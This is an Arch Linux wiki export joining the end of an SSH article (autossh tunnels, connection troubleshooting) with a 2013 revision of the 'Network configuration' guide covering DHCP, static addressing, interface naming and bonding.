When a ssh session or tunnel cannot be kept alive, because for example bad network conditions cause the sshd client to disconnect, you can use [http://www.harding.motd.ca/autossh/ Autossh] to automatically restart them. Autossh can be installed from the [[official repositories]]. <br />
<br />
Usage examples:<br />
$ autossh -M 0 -o "ServerAliveInterval 45" -o "ServerAliveCountMax 2" username@example.com<br />
Combined with [[ sshfs ]]:<br />
$ sshfs -o reconnect,compression=yes,transform_symlinks,ServerAliveInterval=45,ServerAliveCountMax=2,ssh_command='autossh -M 0' username@example.com: /mnt/example <br />
Connecting through a SOCKS-proxy set by [[ Proxy_settings ]]:<br />
$ autossh -M 0 "ServerAliveInterval 45" -o "ServerAliveCountMax 2" -NCD 8080 username@example.com <br />
With the {{ic|-f}} option autossh can be made to run as a background process. Running it this way however means the passprase cannot be entered interactively.<br />
<br />
The session will end once you type {{ic|exit}} in the session, or the autossh process receives a SIGTERM, SIGINT of SIGKILL signal.<br />
<br />
If you want to automatically start autossh, it is now easy to get systemd to manage this for you. For example, you could create a systemd unit file like this:<br />
<br />
[Unit]<br />
Description=AutoSSH service for port 2222<br />
After=network.target<br />
<br />
[Service]<br />
ExecStart=/usr/bin/autossh -M 0 2222:localhost:2222 foo@bar.com<br />
<br />
Then place this in, for example, /etc/systemd/system/system/autossh.service. Of course, you can make this unit more complex if necessary (see the systemd documentation for details), and obviously you can use your own options for autossh.<br />
<br />
You can then enable your autossh tunnels with, e.g.:<br />
<br />
$ systemctl start autossh<br />
(or whatever you called the service file)<br />
<br />
It is also easy to maintain several autossh processes, to keep several tunnels alive. Just create multiple .service files with different names.<br />
<br />
== Troubleshooting ==<br />
=== Connection refused or timeout problem ===<br />
<br />
==== Is your router doing port forwarding? ====<br />
The first thing is to make sure that your router knows to forward any incoming ssh connection to your machine. Your external IP is given to you by your ISP, and it is associated with any requests coming out of your router. So your router needs to know that any incoming ssh connection to your external IP needs to be forwarded to your machine running sshd.<br />
<br />
Find your internal network address.<br />
<br />
ip a<br />
<br />
Find your interface device and look for the inet field. Then access your router's configuration web interface, using your router's IP (find this on the web). Tell your router to forward it to your inet IP. Go to [http://portforward.com/] for more instructions on how to do so for your particular router.<br />
<br />
==== Is SSH running and listening? ====<br />
$ ss -tnlp<br />
<br />
If the above command do not show SSH port is open, SSH is NOT running. Check {{ic|/var/log/messages}} for errors etc.<br />
<br />
==== Are there firewall rules blocking the connection? ====<br />
{{out of date|rc.d is deprecated with systemd}}<br />
Flush your iptables rules to make sure they are not interfering:<br />
<br />
# rc.d stop iptables<br />
<br />
or:<br />
<br />
# iptables -P INPUT ACCEPT<br />
# iptables -P OUTPUT ACCEPT<br />
# iptables -F INPUT<br />
# iptables -F OUTPUT<br />
<br />
==== Is the traffic even getting to your computer? ====<br />
Start a traffic dump on the computer you're having problems with:<br />
<br />
# tcpdump -lnn -i any port ssh and tcp-syn<br />
<br />
This should show some basic information, then wait for any matching traffic to happen before displaying it. Try your connection now. If you do not see any output when you attempt to connect, then something outside of your computer is blocking the traffic (e. g., hardware firewall, NAT router etc.).<br />
<br />
==== Your ISP or a third party blocking default port? ====<br />
{{Note|Try this step if you '''KNOW''' you aren't running any firewalls and you know you have configured the router for DMZ or have forwarded the port to your computer and it still doesn't work. Here you will find diagnostic steps and a possible solution.}}<br />
<br />
In some cases, your ISP might block the default port (SSH port 22) so whatever you try (opening ports, hardening the stack, defending against flood attacks, et al) ends up useless. To confirm this, create a server on all interfaces (0.0.0.0) and connect remotely. <br />
<br />
If you get an error message comparable to this:<br />
ssh: connect to host www.inet.hr port 22: Connection refused<br />
<br />
That means the port '''ISN'T ''' being blocked by the ISP, but the server doesn't run SSH on that port (See [http://en.wikipedia.org/wiki/Security_through_obscurity security through obscurity]).<br />
<br />
However, if you get an error message comparable to this:<br />
ssh: connect to host 111.222.333.444 port 22: Operation timed out <br />
<br />
That means that something is rejecting your TCP traffic on port 22. Basically that port is stealth, either by your firewall or 3rd party intervetion (like an ISP blocking and/or rejecting incoming traffic on port 22). If you know you aren't running any firewall on your computer, and you know that Gremlins aren't growing in your routers and switches, then your ISP is blocking the traffic.<br />
<br />
To double check, you can run Wireshark on your server and listen to traffic on port 22. Since Wireshark is a Layer 2 Packet Sniffing utility, and TCP/UDP are Layer 3 and above (See [http://en.wikipedia.org/wiki/TCP/IP_model IP Network stack]), if you don't receive anything while connecting remotely, a third party is most likely to be blocking the traffic on that port to your server.<br />
<br />
===== Diagnosis via Wireshark =====<br />
First install Wireshark using pacman.<br />
pacman -Sy wireshark-cli <br />
<br />
And then run it using,<br />
tshark -f "tcp port 22" -i NET_IF<br />
<br />
where NET_IF is the network interface for a WAN connection (see {{ic|ip a}} to check). If you aren't receiving any packets while trying to connect remotely, you can be very sure that your ISP is blocking the incoming traffic on port 22.<br />
<br />
===== Possible solution =====<br />
The solution is just to use some other port that the ISP isn't blocking. Open the {{ic|/etc/ssh/sshd_config}} and configure the file to use different ports. For example, add:<br />
<br />
Port 22<br />
Port 1234<br />
<br />
Also make sure that other "Port" configuration lines in the file are commented out. Just commenting "Port 22" and putting "Port 1234" won't solve the issue because then sshd will only listen on port 1234. Use both lines to run the SSH server on both ports. <br />
<br />
Restart the server {{ic|systemctl restart sshd.service}} and you're almost done. You still have to configure your client(s) to use the other port instead of the default port. There are numerous solutions to that problem, but let's cover two of them here.<br />
<br />
==== Read from socket failed: connection reset by peer ====<br />
Recent versions of openssh sometimes fail with the above error message, due to a bug involving elliptic curve cryptography. In that case add the following line to {{ic|~/.ssh/config}}:<br />
<br />
HostKeyAlgorithms ssh-rsa-cert-v01@openssh.com,ssh-dss-cert-v01@openssh.com,ssh-rsa-cert-v00@openssh.com,ssh-dss-cert-v00@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss<br />
<br />
With openssh 5.9, the above fix doesn't work. Instead, put the following lines in {{ic|~/.ssh/config}}:<br />
<br />
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc <br />
MACs hmac-md5,hmac-sha1,hmac-ripemd160<br />
<br />
See also the [http://www.gossamer-threads.com/lists/openssh/dev/51339 discussion] on the openssh bug forum.<br />
<br />
=== "[your shell]: No such file or directory" / ssh_exchange_identification problem ===<br />
One possible cause for this is the need of certain SSH clients to find an absolute path (one returned by {{Ic|whereis -b [your shell]}}, for instance) in {{Ic|$SHELL}}, even if the shell's binary is located in one of the {{Ic|$PATH}} entries. Another reason can be that the user is no member of the ''network'' group.<br />
<br />
==="Terminal unknown" or "Error opening terminal" error message===<br />
With ssh it is possible to receive errors like "Terminal unknown" upon logging in. Starting ncurses applications like nano fails with the message "Error opening terminal". There are two methods to this problem, a quick one using the $TERM variable and a profound one using the terminfo file.<br />
<br />
====Workaround by setting the $TERM variable====<br />
After connecting to the remote server set the $TERM variable to "xterm" with the following command.<br />
<br />
{{ic|TERM&#61;xterm}}<br />
<br />
This method is a workaround and should be used on ssh servers you do seldomly connect to, because it can have unwanted side effects. Also you have to repeat the command after every connection, or alternatively set it in ~.bashrc .<br />
====Solution using terminfo file====<br />
A profound solution is transferring the terminfo file of the terminal on your client computer to the ssh server. In this example we cover how to setup the terminfo file for the "rxvt-unicode-256color" terminal.<br />
Create the directory containing the terminfo files on the ssh server, while you are logged in to the server issue this command:<br />
<br />
{{ic| mkdir -p ~/.terminfo/r/}}<br />
<br />
Now copy the terminfo file of your terminal to the new directory. Replace ''"rxvt-unicode-256color"'' with your client's terminal in the following command and ''ssh-server'' with the relevant user and server adress.<br />
<br />
{{ic|$ scp /usr/share/terminfo/r/''rxvt-unicode-256color'' ssh-server:~/.terminfo/r/}}<br />
<br />
After logging in and out from the ssh server the problem should be fixed.<br />
<br />
== See also ==<br />
*[[SSH Keys]]<br />
*[[Pam abl]]<br />
*[[fail2ban]]<br />
*[[sshguard]]<br />
*[[Sshfs]]<br />
*[[Syslog-ng]] : To send ssh log data to another file<br />
<br />
== Links & references ==<br />
*[http://www.soloport.com/iptables.html A Cure for the Common SSH Login Attack]<br />
*[http://www.la-samhna.de/library/brutessh.html Defending against brute force ssh attacks]<br />
*[http://www.ibm.com/developerworks/library/l-keyc/index.html OpenSSH key management, Part 1] and [http://www.ibm.com/developerworks/library/l-keyc2 Part 2] on IBM developerWorks</div>Wakehttps://wiki.archlinux.org/index.php?title=Network_configuration&diff=251736Network configuration2013-03-23T23:33:08Z<p>Wake: /* No eth0 with Atheros AR8161 */ Install after kernel change.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Getting and installing Arch]]<br />
[[cs:Configuring Network]]<br />
[[es:Configuring Network]]<br />
[[fr:Connexions reseau]]<br />
[[it:Configuring Network]]<br />
[[ja:Network Configuration]]<br />
[[nl:Configuring Network]]<br />
[[pt:Configuring Network]]<br />
[[ro:Configurare retea]]<br />
[[ru:Configuring Network]]<br />
[[sk:Configuring Network]]<br />
[[tr:Ağ_Yapılandırması]]<br />
[[zh-CN:Configuring Network]]<br />
{{Article summary start}}<br />
{{Article summary text|A simple guide for setting up and troubleshooting network.}}<br />
{{Article summary heading|Overview}}<br />
{{Article summary text|{{Networking overview}}}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|Jumbo Frames}}<br />
{{Article summary wiki|Firewalls}}<br />
{{Article summary wiki|Samba}}<br />
{{Article summary wiki|Wireless Setup}}<br />
{{Article summary end}}<br />
<br />
== Check the connection ==<br />
{{Note|If you receive an error like {{ic|ping: icmp open socket: Operation not permitted}} when executing ping, try to re-install the {{ic|iputils}} package.}} <br />
<br />
Many times, the basic installation procedure has created a working network configuration. To check if this is so, use the following command:<br />
<br />
{{Note|The {{ic|-c 3}} option calls it three times. See {{ic|man ping}} for more information.}}<br />
<br />
{{hc|$ ping -c 3 www.google.com|2=<br />
PING www.l.google.com (74.125.224.146) 56(84) bytes of data.<br />
64 bytes from 74.125.224.146: icmp_req=1 ttl=50 time=437 ms<br />
64 bytes from 74.125.224.146: icmp_req=2 ttl=50 time=385 ms<br />
64 bytes from 74.125.224.146: icmp_req=3 ttl=50 time=298 ms<br />
<br />
--- www.l.google.com ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 1999ms<br />
rtt min/avg/max/mdev = 298.107/373.642/437.202/57.415 ms}}<br />
<br />
If it works, then you may only wish to personalize your settings from the options below.<br />
<br />
If the previous command complains about unknown hosts, it means that your machine was unable to resolve this domain name. It might be related to your service provider or your router/gateway. You can try pinging a static IP address to prove that your machine has access to the Internet.<br />
<br />
{{hc|$ ping -c 3 8.8.8.8|2=<br />
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.<br />
64 bytes from 8.8.8.8: icmp_req=1 ttl=53 time=52.9 ms<br />
64 bytes from 8.8.8.8: icmp_req=2 ttl=53 time=72.5 ms<br />
64 bytes from 8.8.8.8: icmp_req=3 ttl=53 time=70.6 ms<br />
<br />
--- 8.8.8.8 ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 2002ms<br />
rtt min/avg/max/mdev = 52.975/65.375/72.543/8.803 ms}}<br />
<br />
{{Note|{{ic|8.8.8.8}} is a static address that is easy to remember. It is the address of Google's primary DNS server, therefore it can be considered reliable, and is generally not blocked by content filtering systems and proxies.}}<br />
<br />
If you are able to ping this address, you may try adding this nameserver to your {{ic|/etc/resolv.conf}} file.<br />
<br />
== Set the hostname ==<br />
<br />
A [[Wikipedia:Hostname|hostname]] is a unique name created to identify a machine on a network. To set the hostname: <br />
# hostnamectl set-hostname '''myhostname'''<br />
<br />
{{Note|You no longer need to edit {{ic|/etc/hosts}}, {{pkg|systemd}} will provide host name resolution, and is installed on all systems by default.}}<br />
<br />
To set the hostname temporarily (until a reboot), use the {{ic|hostname}} command from {{Pkg|inetutils}}:<br />
<br />
# hostname ''myhostname''<br />
<br />
== Device Driver ==<br />
<br />
=== Check the driver status ===<br />
<br />
Udev should detect your network interface card ([[Wikipedia:Network_interface_controller|NIC]]) and automatically load the necessary module at start up. Check the "Ethernet controller" entry (or similar) from the {{ic|lspci -v}} output. It should tell you which kernel module contains the driver for your network device. For example:<br />
<br />
{{hc|$ lspci -v|<br />
02:00.0 Ethernet controller: Attansic Technology Corp. L1 Gigabit Ethernet Adapter (rev b0)<br />
...<br />
Kernel driver in use: atl1<br />
Kernel modules: atl1}}<br />
<br />
Next, check that the driver was loaded via {{ic|dmesg <nowiki>|</nowiki> grep ''module_name''}}. For example:<br />
<br />
$ dmesg | grep atl1<br />
...<br />
atl1 0000:02:00.0: eth0 link is up 100 Mbps full duplex<br />
<br />
Skip the next section if the driver was loaded successfully. Otherwise, you will need to know which module is needed for your particular model.<br />
<br />
=== Load the device module ===<br />
<br />
Google for the right module/driver for the chipset. Once you know which module to use, you can [[Kernel modules#Loading|load it]] with:<br />
<br />
# modprobe ''module_name''<br />
<br />
If udev is not detecting and loading the proper module automatically during bootup, you can add it to a {{ic|*.conf}} file from the {{ic|/etc/modules-load.d/}} folder so that you do not need to {{ic|modprobe}} it every time you boot. For example, if {{ic|tg3}} is the network module:<br />
<br />
# tee /etc/modules-load.d/tg3.conf <<< "tg3"<br />
<br />
Other common modules are {{ic|8139too}} for cards with a Realtek chipset, or {{ic|sis900}} for cards with a SiS chipset.<br />
<br />
== Network Interfaces ==<br />
<br />
=== Device names ===<br />
<br />
For motherboards that have integrated NICs, it is important to have fixed device name. Many configuration issues are caused by interface name changing.<br />
<br />
[[Udev]] is responsible for which device gets which name. Since systemd v197 introduced [http://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames Predictable Network Interface Names], which automatically assigns static names to network devices. Interfaces are now prefixed with en (ethernet), wl (WLAN), or ww (WWAN) followed by an automatically generated identifier, creating an entry such as {{ic|enp0s25}}. <br />
<br />
This behavior may be disabled by adding a symlink:<br />
<br />
# ln -s /dev/null /etc/udev/rules.d/80-net-name-slot.rules<br />
<br />
Users upgrading from an earlier systemd version will have a blank rules file created automatically. So if you want no use persistent device names, just delete the file.<br />
<br />
==== Change device name ====<br />
You can change the device name using {{ic|ifrename}} from package {{Pkg|wireless_tools}}.<br />
<br />
Run ifrename directly:<br />
<br />
# ifrename -i eth0 -n lan<br />
<br />
or create config file ({{ic|/etc/iftab}}), for example:<br />
<br />
lan mac 00:0C:6E:C6:94:81<br />
internet mac 00:0C:6E:C6:94:82<br />
<br />
and run<br />
<br />
# ifrename -c /etc/iftab<br />
<br />
If you are using ppp, add into {{ic|/etc/ppp/ip-up}} script the following lines:<br />
<br />
IF=$1<br />
ip link set dev $IF down<br />
/usr/sbin/ifrename -i $IF -n <NEWNAME><br />
ip link set dev <NEWNAME> up<br />
<br />
where <NEWNAME> is the new name for the ppp interface.<br />
<br />
Another way is to define the name manually with an udev-rule. For example: <br />
{{hc|/etc/udev/rules.d/10-network.rules|2=<br />
SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="aa:bb:cc:dd:ee:ff", NAME="net1"<br />
SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="ff:ee:dd:cc:bb:aa", NAME="net0"}}<br />
A couple things to note:<br />
<br />
* To get the MAC address of each card, use this command: {{ic|cat /sys/class/net/'''device-name'''/address}}<!-- {{ic|<nowiki>udevadm info -a -p /sys/class/net/<yourdevice> | grep address | tr [A-Z] [a-z]</nowiki>}} --><br />
* Make sure to use the lower-case hex values in your udev rules. It doesn't like upper-case. <br />
{{Note|When choosing the static names '''it should be avoided to use names in the format of "eth''X''" and "wlan''X''"''', because this may lead to race conditions between the kernel and udev during boot. Instead, it is better to use interface names that are not used by the kernel as default, e.g.: {{ic|net0}}, {{ic|net1}}, {{ic|wifi0}}, {{ic|wifi1}}}}.<br />
<br />
=== Get current device names ===<br />
<br />
Current NIC names can be found via sysfs<br />
<br />
{{hc|$ ls /sys/class/net|<br />
lo eth0 eth1 firewire0}}<br />
<br />
=== Enabling and disabling network interfaces ===<br />
<br />
You can activate or deactivate network interfaces using:<br />
<br />
# ip link set eth0 up<br />
# ip link set eth0 down<br />
<br />
To check the result:<br />
<br />
{{hc|$ ip link show dev eth0|<br />
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master br0 state UP mode DEFAULT qlen 1000<br />
[...]}}<br />
<br />
== Configure the IP address ==<br />
<br />
You have two options: a dynamically assigned address using [[Wikipedia:Dynamic Host Configuration Protocol|DHCP]], or an unchanging "static" address.<br />
<br />
=== Dynamic IP address ===<br />
<br />
==== Manually run DHCP Client Daemon ====<br />
<br />
Please note that {{ic|dhcpcd}} is not {{ic|dhcpd}}.<br />
<br />
{{hc|# dhcpcd eth0|<br />
dhcpcd: version 5.1.1 starting<br />
dhcpcd: eth0: broadcasting for a lease<br />
...<br />
dhcpcd: eth0: leased 192.168.1.70 for 86400 seconds}}<br />
<br />
And now, {{ic|ip addr show dev eth0}} should show your inet address.<br />
<br />
For some people, {{ic|dhclient}} (from the {{Pkg|dhclient}} package) works where {{ic|dhcpcd}} fails.<br />
<br />
==== Run DHCP at boot ====<br />
<br />
If you simply want to use DHCP for your Ethernet connection, you can use {{ic|dhcpcd@.service}} (provided by the {{Pkg|dhcpcd}} package).<br />
<br />
To enable DHCP for {{ic|eth0}}, simply use:<br />
<br />
# systemctl start dhcpcd@eth0<br />
<br />
You can enable the service to automatically start at boot with:<br />
<br />
# systemctl enable dhcpcd@eth0<br />
<br />
If the dhcpd service starts before your network card module ({{bug|30235}}), manually add your network card to {{ic|/etc/modules-load.d/*.conf}}. For example, if your Realtek card needs {{ic|r8169}} to be loaded, create:<br />
<br />
{{hc|/etc/modules-load.d/realtek.conf|<br />
r8169}}<br />
<br />
{{Tip|To find out which modules are used by your network card, use {{ic|lspci -k}}.}}<br />
<br />
If you use DHCP and you do '''not''' want your DNS servers automatically assigned every time you start your network, be sure to add the following to the last section of {{ic|dhcpcd.conf}}:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nohook resolv.conf}}<br />
<br />
To prevent {{ic|dhcpcd}} from adding domain name servers to {{ic|/etc/resolv.conf}}, use the {{ic|nooption}} option:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nooption domain_name_servers}}<br />
<br />
Then add your own DNS name server to {{ic|/etc/resolv.conf}}.<br />
<br />
You may use the {{Pkg|openresolv}} package if several different processes want to control {{ic|/etc/resolv.conf}} (e.g. {{Pkg|dhcpcd}} and a VPN client). No additional configuration for {{Pkg|dhcpcd}} is needed to use {{Pkg|openresolv}}.<br />
<br />
{{Note|It is possible to have a static IP address using {{Pkg|dhcpcd}}. Simply edit your {{ic|/etc/conf.d/dhcpcd}} file to look something like this (where {{ic|x.x.x.x}} is your desired IP address):<br />
<br />
{{bc|1=DHCPCD_ARGS="-q -s x.x.x.x"}}}}<br />
<br />
=== Static IP address ===<br />
<br />
There are various reasons why you may wish to assign static IP addresses on your network. For instance, one may gain a certain degree of predictability with unchanging addresses, or you may not have a DHCP server available.<br />
<br />
{{Note|If you share your Internet connection from a Windows machine without a router, be sure to use static IP addresses on both computers to avoid LAN issues.}}<br />
<br />
You need:<br />
<br />
* Static IP address<br />
* [[Wikipedia:Subnetwork|Subnet mask]]<br />
* [[Wikipedia:Broadcast_address|Broadcast address]]<br />
* [[Wikipedia:Default_gateway|Gateway]]'s IP address<br />
<br />
If you are running a private network, it is safe to use IP addresses in 192.168.*.* for your IP addresses, with a subnet mask of 255.255.255.0 and a broadcast address of 192.168.*.255. The gateway is usually 192.168.*.1 or 192.168.*.254.<br />
<br />
==== Manual assignment ====<br />
<br />
You can assign a static IP address in the console:<br />
<br />
# ip addr add <IP address>/<subnet mask> dev <interface><br />
<br />
For example:<br />
<br />
# ip addr add 192.168.1.2/24 dev eth0<br />
<br />
{{Note|The subnet mask was specified using [[Wikipedia:CIDR_notation|CIDR notation]].}}<br />
<br />
For more options, see {{ic|man ip}}.<br />
<br />
Add your gateway like so:<br />
<br />
# ip route add default via <default gateway IP address><br />
<br />
For example:<br />
<br />
# ip route add default via 192.168.1.1<br />
<br />
If you the get the error "No such process", it means you have to run {{ic|ip link set dev eth0 up}} as root.<br />
<br />
====Manual connection at boot using systemd====<br />
This section details how to manually connect using [[systemd]].<br />
<br />
{{Note|We use {{ic|net0}} as the interface name in these examples, you have to replace all occurrences (including those in the {{ic|BindsTo}} and {{ic|After}} values) with the name of the interface you are configuring.}}<br />
<br />
=====Using [[dhcpcd]]=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Network Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/sbin/ip link set dev net0 up<br />
ExecStart=/usr/sbin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/sbin/dhcpcd net0<br />
<br />
ExecStop=/sbin/dhcpcd -k net0<br />
ExecStop=/sbin/ip addr flush dev net0<br />
ExecStop=/sbin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
# systemctl enable network<br />
<br />
To test, reboot or stop all other network daemons and run as root:<br />
# systemctl start network<br />
<br />
=====Using a static IP address=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses a static IP address and [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Wireless Static IP Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/sbin/ip link set dev net0 up<br />
ExecStart=/usr/sbin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/sbin/ip addr add 192.168.0.10/24 dev net0<br />
ExecStart=/sbin/ip route add default via 192.168.0.1<br />
<br />
ExecStop=/sbin/ip addr flush dev net0<br />
ExecStop=/sbin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
Do not forget to enable it!<br />
# systemctl enable network<br />
<br />
To test, reboot or make sure all other network daemons are stopped and then run as root<br />
# systemctl start network<br />
<br />
==== Calculating addresses ====<br />
<br />
You can use {{ic|ipcalc}} provided by the {{Pkg|ipcalc}} package to calculate IP broadcast, network, netmask, and host ranges for more advanced configurations. For example, I use ethernet over firewire to connect a windows machine to arch. For security and network organization, I placed them on their own network and configured the netmask and broadcast so that they are the only 2 machines on it. To figure out the netmask and broadcast addresses for this, I used ipcalc, providing it with the IP of the arch firewire nic 10.66.66.1, and specifying ipcalc should create a network of only 2 hosts.<br />
<br />
{{hc|$ ipcalc -nb 10.66.66.1 -s 1|2=<br />
Address: 10.66.66.1<br />
<br />
Netmask: 255.255.255.252 = 30<br />
Network: 10.66.66.0/30<br />
HostMin: 10.66.66.1<br />
HostMax: 10.66.66.2<br />
Broadcast: 10.66.66.3<br />
Hosts/Net: 2 Class A, Private Internet}}<br />
<br />
== Load configuration ==<br />
<br />
To test your settings either reboot the computer or reload the relevant systemd services:<br />
<br />
# systemctl restart dhcpcd@eth0<br />
<br />
Try pinging your gateway, DNS server, ISP provider and other Internet sites, in that order, to detect any connection problems along the way, as in this example:<br />
<br />
$ ping -c 3 www.google.com<br />
<br />
== Additional settings ==<br />
<br />
=== ifplugd for laptops ===<br />
<br />
{{Pkg|ifplugd}} in [[Official Repositories]] is a daemon which will automatically configure your Ethernet device when a cable is plugged in and automatically unconfigure it if the cable is pulled. This is useful on laptops with onboard network adapters, since it will only configure the interface when a cable is really connected. Another use is when you just need to restart the network but do not want to restart the computer or do it from the shell.<br />
<br />
By default it is configured to work for the {{ic|eth0}} device. This and other settings like delays can be configured in {{ic|/etc/ifplugd/ifplugd.conf}}.<br />
<br />
Enabling {{ic|net-auto-wired.service}} should start ifplugd on bootup if you have {{Pkg|netcfg}} installed, otherwise you can use {{ic|ifplugd@eth0.service}}.<br />
<br />
=== Bonding or LAG ===<br />
<br />
You will need {{Pkg|netcfg}} from the [[Official Repositories]], as well as the {{AUR|netcfg-bonding}} package from the [[AUR]].<br />
<br />
Edit/create the following files:<br />
<br />
{{hc|/etc/network.d/bonded|2=<br />
CONNECTION="bonding"<br />
INTERFACE="bond0"<br />
SLAVES="eth0 eth1"<br />
IP="dhcp"<br />
DHCP_TIMEOUT=10}}<br />
<br />
{{hc|/etc/modules-load.d/bonding.conf|<br />
bonding}}<br />
<br />
Set up netcfg to use the bond0 interface.<br />
<br />
Start your network:<br />
$ systemctl enable netcfg@bonded<br />
<br />
{{Note|To change the bonding mode (default is round robin) to, e.g, dynamic link aggregation:<br />
<br />
Create {{ic|/etc/modprobe.d/bonding.conf}}:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=4<br />
options bonding miimon=100}}<br />
<br />
For more information about the different bonding policies (and other driver settings) see the [http://sourceforge.net/projects/bonding/files/Documentation/ Linux Ethernet Bonding Driver HOWTO].}}<br />
<br />
To activate the new bonded ports modprobe {{ic|bonding}}, stop {{ic|network}} and start the {{ic|net-profiles}} service:<br />
<br />
# modprobe bonding<br />
# systemctl stop network<br />
# systemctl start net-profiles<br />
<br />
To check the status and bonding mode:<br />
<br />
$ cat /proc/net/bonding/bond0<br />
<br />
==== Wired -> Wireless Failover ====<br />
<br />
Using {{ic|bonding}} to fallback to wireless when the wired ethernet goes down, this also detects the presence of either network connection and starts dhcpcd when either or both are connected.<br />
<br />
You'll need {{Pkg|netcfg}}, {{Pkg|ifplugd}}, and {{Pkg|wpa_supplicant}} from the official repositories.<br />
<br />
First configure the bonding driver to use active-backup:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=active-backup<br />
options bonding miimon=100<br />
options bonding primary=eth0<br />
options bonding max_bonds=0}}<br />
<br />
The `max-bonds` line avoids getting the "Interface bond0 already exists" error.<br />
<br />
Next, configure a {{Pkg|netcfg}} profile to enslave the two hardware interfaces:<br />
<br />
{{hc|/etc/network.d/failover|2=<br />
CONNECTION="bond"<br />
DESCRIPTION="A wired connection with failover to wireless"<br />
INTERFACE="bond0"<br />
SLAVE_INTERFACES=("eth0" "wlan0")<br />
IP="no"<br />
SKIPNOCARRIER="no"}}<br />
<br />
Enable the profile on startup.<br />
<br />
# systemctl enable netcfg@failover<br />
<br />
Configure wpa_supplicant to associate with known networks. This can be done with a netcfg profile (remember to use IP="no"), a wpa_supplicant service running constantly, or on-demand with [[wpa_cli]]. Ways to do this are covered on the [[wpa_supplicant]] page.<br />
<br />
Create an {{Pkg|ifplugd}} action for automatic DHCP assignment on the bonded interface:<br />
<br />
{{hc|/etc/ifplugd/bond_dhcp.action|2=<br />
#!/bin/sh<br />
<br />
case "$2" in<br />
up)<br />
systemctl start "dhcpcd@$1.service" && exit 0<br />
;;<br />
down)<br />
systemctl stop "dhcpcd@$1.service" && exit 0<br />
;;<br />
*)<br />
echo "Wrong arguments" > /dev/stderr<br />
;;<br />
esac<br />
exit 1}}<br />
<br />
and make it executable<br />
<br />
# chmod +x /etc/ifplugd/bond_dhcp.action<br />
<br />
Then create the [[systemd]] service which starts ifplugd for bond0:<br />
<br />
{{hc|/etc/systemd/system/net-auto-bonded@.service|2=<br />
[Unit]<br />
Description=Provides automatic dhcp resolution for bonded failover connection<br />
Requires=netcfg@failover.service<br />
After=netcfg@failover.service<br />
<br />
[Service]<br />
ExecStart=/usr/bin/ifplugd -i %i -r /etc/ifplugd/bond_dhcp.action -fIns<br />
<br />
[Install]<br />
WantedBy=multi-user.target}}<br />
<br />
Enable the net-auto-bonded service and reboot:<br />
<br />
# systemctl enable net-auto-bonded@bond0.service<br />
# reboot<br />
<br />
If you have a wired and wireless connection to the same network, you can probably now disconnect and reconnect the wired connection without losing connectivity. In most cases, even streaming music won't skip!<br />
<br />
=== IP address aliasing ===<br />
<br />
IP aliasing is the process of adding more than one IP address to a network interface. With this, one node on a network can have multiple connections to a network, each serving a different purpose.<br />
<br />
To use IP aliasing from [[netcfg]], change {{ic|POST_UP}} and {{ic|PRE_DOWN}} commands in your network profile to set up the additional IP addresses manually. See [https://bbs.archlinux.org/viewtopic.php?pid=1036395#p1036395 here] for details.<br />
<br />
==== Example ====<br />
<br />
You will need {{Pkg|netcfg}} from the [[Official Repositories]].<br />
<br />
Prepare the configuration:<br />
<br />
{{hc|/etc/network.d/mynetwork|2=<br />
<br />
CONNECTION='ethernet'<br />
DESCRIPTION='Five different addresses on the same NIC.'<br />
INTERFACE='eth0'<br />
IP='static'<br />
ADDR='192.168.1.10'<br />
GATEWAY='192.168.1.1'<br />
DNS=('192.168.1.1')<br />
DOMAIN=''<br />
POST_UP='x=0; for i in 11 12 13 14; do ip addr add 192.168.1.$i/24 brd 192.168.1.255 dev eth0 label eth0:$((x++)); done'<br />
PRE_DOWN='for i in 11 12 13 14; do ip addr del 192.168.1.$i/24 dev eth0; done'}}<br />
<br />
The simply execute: <br />
<br />
$ systemctl enable net-auto-wired.service<br />
<br />
=== Change MAC/hardware address ===<br />
<br />
See [[MAC Address Spoofing]].<br />
<br />
=== Internet Share ===<br />
<br />
See [[Internet Share]].<br />
<br />
=== Router Configuration ===<br />
<br />
See [[Router]].<br />
<br />
== Troubleshooting ==<br />
<br />
=== Swapping computers on the cable modem ===<br />
<br />
